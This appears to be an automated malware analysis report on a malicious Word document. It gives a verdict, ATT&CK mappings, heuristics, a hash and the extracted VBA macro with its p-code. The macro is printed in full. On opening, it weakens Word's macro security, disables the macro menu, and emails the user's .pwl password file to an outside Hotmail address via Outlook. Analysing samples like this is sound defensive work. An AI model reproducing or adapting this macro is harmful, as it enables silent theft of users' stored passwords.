Verdict: MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
The sample is a malicious Word document containing a VBA macro that executes upon opening (Document_Open). The macro attempts to create an Outlook Application object and send an email to 'neetazz86@hotmail.com' with the subject 'Pwl From <UserName>' and a body of 'Here it is'. It attaches a file named '<UserName>.pwl' located in the user's Windows directory. This behavior suggests an attempt to exfiltrate or distribute sensitive information, potentially related to password files, or to spread further via email.
Heuristics (4)
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5114 bytes |

SHA-256: 23ded3e2614510c1de86e83d556b87fd67345d8b1bc9418b8b5b2d6959ac31c5
Detection: ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
End Sub
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice, GetUser, Xx
Dim ThePath As String * 255
Dim PwlPath As String
GetUser = Application.UserName
Xx = GetWindowsDirectory(ThePath, 255)
PwlPath = Left(ThePath, Xx) & "\" & GetUser & ".pwl"
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
DasMapiName.Logon
TheAddress = "neetazz86@hotmail.com"
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
BreakUmOffASlice.Recipients.Add TheAddress
BreakUmOffASlice.Subject = "Pwl From " & Application.UserName
BreakUmOffASlice.Body = "Here it is"
BreakUmOffASlice.Attachments.Add PwlPath
BreakUmOffASlice.Send
BreakUmOffASlice.Delete
DasMapiName.Logoff
' Selection.TypeText PwlPath
End Sub
Attribute VB_Name = "Module1"
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
'ucbC><Kd
' Processing file: /opt/analyzer/scan_staging/d5f09024d48247d0912e7e319d93cd7b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7428 bytes
' Line #0:
' Line #1:
' Line #2:
' FuncDefn (Private Sub Document_New())
' Line #3:
' Line #4:
' EndSub
' Line #5:
' Line #6:
' FuncDefn (Private Sub Document_Open())
' Line #7:
' OnError (Resume Next)
' Line #8:
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #9:
' LitVarSpecial (False)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #10:
' LitDI2 0x0001
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #11:
' ElseBlock
' Line #12:
' LitVarSpecial (False)
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #13:
' EndIfBlock
' Line #14:
' Line #15:
' Dim
' VarDefn UngaDasOutlook
' VarDefn DasMapiName
' VarDefn BreakUmOffASlice
' VarDefn GetUser
' VarDefn Xx
' Line #16:
' Dim
' LitDI2 0x00FF
' VarDefn ThePath
' Line #17:
' Dim
' VarDefn PwlPath (As String)
' Line #18:
' Line #19:
' Ld Application
' MemLd UserName
' St GetUser
' Line #20:
' Ld ThePath
' LitDI2 0x00FF
' ArgsLd GetWindowsDirectory 0x0002
' St Xx
' Line #21:
' Ld ThePath
' Ld Xx
' ArgsLd LBound 0x0002
' LitStr 0x0001 "\"
' Concat
' Ld GetUser
' Concat
' LitStr 0x0004 ".pwl"
' Concat
' St PwlPath
' Line #22:
' Line #23:
' SetStmt
' LitStr 0x0013 "Outlook.Application"
' ArgsLd CreateObject 0x0001
' Set UngaDasOutlook
' Line #24:
' SetStmt
' LitStr 0x0004 "MAPI"
' Ld UngaDasOutlook
' ArgsMemLd GetNameSpace 0x0001
' Set DasMapiName
' Line #25:
' Line #26:
' Ld DasMapiName
' ArgsMemCall Logon 0x0000
' Line #27:
' LitStr 0x0015 "neetazz86@hotmail.com"
' St TheAddress
' Line #28:
' SetStmt
' LitDI2 0x0000
' Ld
... (truncated)